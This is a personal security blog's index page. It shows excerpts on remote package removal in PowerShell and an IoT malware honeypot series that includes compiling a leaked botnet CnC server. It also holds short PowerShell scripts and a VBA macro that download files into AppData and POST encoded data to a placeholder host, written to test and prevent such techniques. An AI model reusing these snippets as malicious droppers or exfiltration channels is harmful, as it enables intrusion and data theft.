Posts

Powershell - Uninstall Packages Remotely

Recently I have been contemplating how I could more efficiently uninstall or view packages that a user has installed on their computer and then uninstall those packages remotely without having to take the time of the user to do so through a remote interactive session.  

I have written the below Powershell script which will prompt you for the computers name or IP Address that you are working with.  Then it will display the installed programs (Notice in the script you can filter by a package name like Java).  Then you can call the package or packages you would like to uninstall by its name.  If your user account is recognized as a local administrator on the computer you should not have an issue.  It does allow you to use other credentials if necessary.
#Powershell program to remove packages that are specified by the user function remove-Package($package, $compName, $credName) { If ($credName -eq $env:USERNAME) { $s = Get-WmiObject -Class Win32_Product -ComputerName $compN…

IoT Malware Analysis - CnC Server - Part 3

Image
Through the information gathered inside of the binaries I began searching for unique strings on Google.  One of the unique strings that I searched for was "HTTPFLOOD GHP".  This pulled back less than 10 results and the first one was from the site hxxp://psbdmp.com/wT1htV9b.  This contained the source code for what they called "Palkia Server.c".


This particular piece of source code was found to have been leaked on 2016-11-12 09:58:05 according to the timestamp on the paste.  I have not validated that the binary in which I found the string matches up with this particular CnC Server source code.

After looking at the source code and understanding the logic, verifying there were no backdoors and other intents to infect my systems I compiled the source code on a temporary server.  Upon execution you need to specify which port it listens on for the bot connections and the number of threads it will utilize.


After you specify the port and the number of threads it begins to …

IoT Malware Analysis - Observations and Statistics - Part 2

Image
On the previous post that I published I utilized a python program to emulate a telnet server, captured commands that were sent to the telnet server, and then utilized those commands to research the binaries that were collected.

In this post I am going to provide information on what happened when 2 of my servers became infected with the malware, statistics on the username and password combinations used, and statistics of which IP Addresses I observed the most attempting to login to my telnet server.

The Mirai botnet gains its popularity in causing Distributed Denial of Service (DDoS) attacks.  This is exactly what happened to both of my honeypot servers that were infected.


As you can see in the above screenshot upon initial infection of the server you see the command "SCANNER ON".  This command causes the infected device to begin scanning for other IP Addresses at random to see if port 23 is open.  If the device can be reached over port 23 then a basic script of logging in, s…

IoT Malware Analysis - Botnets being created through weak credentials... - Part 1

Image
I became curios about the spreading IoT malware through default usernames and passwords due to multiple media articles.  So I spun up a VPS server and started using a tool created by Robert David Graham called telnetlogger.  Immediately I saw the constant barrage of traffic that was being generated.  Now the next question I had was what are the commands that are being executed on these IoT devices.

I first evaluated the source code provided on the Github site for telnetlogger to see if I wanted to re-write some of it to log the commands being sent in.  I then searched around for a honeypot that would emulate a telnet server.  Then I decided to write my own in python.  It is not perfect but it accomplishes logging up to 9 commands after a successful login.  The source code can be found on my github page.

After running this telnet emulator for less than 48 hours I had logged some interesting commands that were trying to download a shell script to then pull down additional binaries that …

Powershell - Scripts to Download and Save a File AND POST Data to a Web Page

Recently I created a couple of simple Powershell scripts to download and save a file and then send a POST Request to a Site.  Below are the scripts that I created.

$wc = New-Object System.Net.WebClient $wc.Headers.Add("User-Agent","IE6")        $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials $response = $wc.DownloadString("http://blah.com/master.txt") Set-Content -Value $response -Path $env:APPDATA\Microsoft\output.txt
---
$url = "http://blah.com/" $encodedData = "b3V0Ym91bmQ%3d"
$params = New-Object System.Collections.Specialized.NameValueCollection $params.Add('poster','blah55') $params.Add('syntax','text') $params.Add('content',$encodedData)
$wc = New-Object System.Net.WebClient $wc.Headers.Add("User-Agent","IE6")        $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy $wc.Proxy.Credent…

VBA - Script to Download a file from a URL

Below is a Visual Basic for Applications script I quickly build to download a file through a Macro to the computer.  This was to test the capability of being able to do it and finding a way to prevent it from occurring.

Sub dFile() ' ' vTest Macro ' ' Dim myURL As String dURL = "http://blah/text.zip"
Dim WinHttpReq As Object Dim fileName As String
fileName = Environ("AppData") & "\microsoft\text.zip" Set WinHttpReq = CreateObject("Microsoft.XMLHTTP") WinHttpReq.Open "GET", dURL WinHttpReq.send
If WinHttpReq.Status = 200 Then     Set oStream = CreateObject("ADODB.Stream")     oStream.Open     oStream.Type = 1     oStream.Write WinHttpReq.responseBody     oStream.SaveToFile fileName, 2     oStream.Close End If
End Sub

Python - Script to Send an Email through Gmail

Below is a python script that I was using to send an email through a gmail account:

#!/usr/bin/python

import smtplib

fromAddress='email@gmail.com'
toAddress='ltrappett@gmail.com'

msg='To another email address.'

username='email@gmail.com'
password='specific use password'

server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username, password)
server.sendmail(fromAddress, toAddress, msg)
server.quit()